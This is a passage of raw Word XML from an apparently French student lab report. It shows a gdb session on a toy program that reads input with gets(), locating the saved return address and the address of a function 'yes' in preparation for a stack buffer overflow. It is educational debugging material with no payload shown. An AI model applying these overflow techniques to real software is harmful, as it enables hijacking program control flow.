    <w:p w14:paraId="78E280ED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0x0000555555555196 &lt;+1&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>mov    %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24790D4B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0x0000555555555199 &lt;+4&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>sub    $0x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FFC033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0x000055555555519d &lt;+8&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>lea    -0x20(%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>),%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="387D4915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0x00005555555551a1 &lt;+12&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>mov    %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39697B54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0x00005555555551a4 &lt;+15&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>mov    $0x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD110C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</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00005555555551a9</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;+20&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>call   0x555555555060 &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gets@plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7073B06E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</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00005555555551ae</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;+25&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>lea    -0x20(%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>),%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21445935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0x00005555555551b2 &lt;+29&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>lea    0xe63(%rip</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>),%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        # 0x55555555601c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561F19A6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0x00005555555551b9 &lt;+36&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>mov    %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0227D584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0x00005555555551bc &lt;+39&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>mov    %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D36E51F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0x00005555555551bf &lt;+42&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>call   0x555555555030 &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcasecmp@plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E00AAA2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0x00005555555551c4 &lt;+47&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>leave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9EE791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   0x00005555555551c5 &lt;+48&gt;:</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D264992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End of assembler dump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E119BE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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b *0x00005555555551a9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A54E3D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Breakpoint 1 at 0x5555555551a9: file goodstudent3.c, line 17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB74730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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b *0x00005555555551ae</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832CBC9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Breakpoint 2 at 0x5555555551ae: file goodstudent3.c, line 18.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0C592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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01684CEE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Starting program: /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sebstreb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/cyber/cours2/goodstudent3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C069A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[Thread debugging using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A760800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 xml:space="preserve">Using host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library "/lib/x86_64-linux-gnu/libthread_db.so.1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1DED56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Are you a good student?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026CBBE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0B630727" w14:textId="77777777" w:rsidR="001407E7" w:rsidRPr="001407E7" w:rsidRDefault="001407E7" w:rsidP="001407E7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1407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Breakpoint 1, 0x00005555555551a9 in check () at goodstudent3.c:17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA30FF9" w14:textId="71160F73" w:rsidR="003617D7" w:rsidRPr="001407E7" w:rsidRDefault="001407E7" w:rsidP="001407E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001407E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE7660" w14:textId="77777777" w:rsidR="003617D7" w:rsidRDefault="003617D7" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D00B736" w14:textId="3E685F3F" w:rsidR="00CB62F8" w:rsidRDefault="00FB0D31" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous utilisons alors </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">info </w:t>
      </w:r>
      <w:r w:rsidR="00854451">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pour retrouver </w:t>
      </w:r>
      <w:r w:rsidR="000D5703">
        <w:t xml:space="preserve">la valeur de la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D5703">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000D5703">
        <w:t xml:space="preserve"> Nous utilisons ensuite la fonction </w:t>
      </w:r>
      <w:r w:rsidR="000D5703">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="000D5703">
        <w:t xml:space="preserve"> pour afficher le contenu de la stac</w:t>
      </w:r>
      <w:r w:rsidR="0035707B">
        <w:t xml:space="preserve">k. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252FFE1" w14:textId="77777777" w:rsidR="00CB62F8" w:rsidRDefault="0035707B" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous utilisons les arguments </w:t>
      </w:r>
      <w:r w:rsidR="002556BF">
        <w:t xml:space="preserve">x pour afficher les valeurs en hexadécimal, g pour </w:t>
      </w:r>
      <w:r w:rsidR="00C72B0D">
        <w:t xml:space="preserve">grouper les valeurs par </w:t>
      </w:r>
      <w:r w:rsidR="00927A4F">
        <w:t>8 octets pour afficher visuellement les adresses</w:t>
      </w:r>
      <w:r w:rsidR="0084638D">
        <w:t xml:space="preserve"> et</w:t>
      </w:r>
      <w:r w:rsidR="00927A4F">
        <w:t xml:space="preserve"> 8 pour afficher </w:t>
      </w:r>
      <w:r w:rsidR="009A5173">
        <w:t xml:space="preserve">64 octets au total et </w:t>
      </w:r>
      <w:r w:rsidR="0084638D">
        <w:t xml:space="preserve">retrouver la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0084638D">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0084638D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023AF33" w14:textId="37319CAB" w:rsidR="00CB4DF6" w:rsidRDefault="0084638D" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous </w:t>
      </w:r>
      <w:r w:rsidR="00932FFC">
        <w:t xml:space="preserve">démarrons l’inspection à partir du </w:t>
      </w:r>
      <w:r w:rsidR="003D0C91">
        <w:t>buffer pour voir le nombre d’octet que nous allons devoir écrire</w:t>
      </w:r>
      <w:r w:rsidR="00946218">
        <w:t xml:space="preserve">. Nous affichons pour finir </w:t>
      </w:r>
      <w:r w:rsidR="00E55010">
        <w:t xml:space="preserve">l’adresse de la fonction yes avec la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E55010">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E55010">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FED782" w14:textId="77777777" w:rsidR="00CB62F8" w:rsidRDefault="00CB62F8" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEBA072" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>info frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29771C84" w14:textId="77777777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>Stack level 0, frame at 0x7fffffffe0d0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DCB65" w14:textId="77777777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 xml:space="preserve"> rip = 0x5555555551a9 in check (goodstudent3.c:17); saved rip = </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x5555555551f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0BA8F" w14:textId="77777777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 xml:space="preserve"> called by frame at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x7fffffffe0f0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0FC1C3C3" w14:textId="77777777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 xml:space="preserve"> source language c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FD214" w14:textId="77777777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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arglist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 0x7fffffffe0c0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB129F" w14:textId="77777777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 xml:space="preserve"> Locals at 0x7fffffffe0c0, Previous frame's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
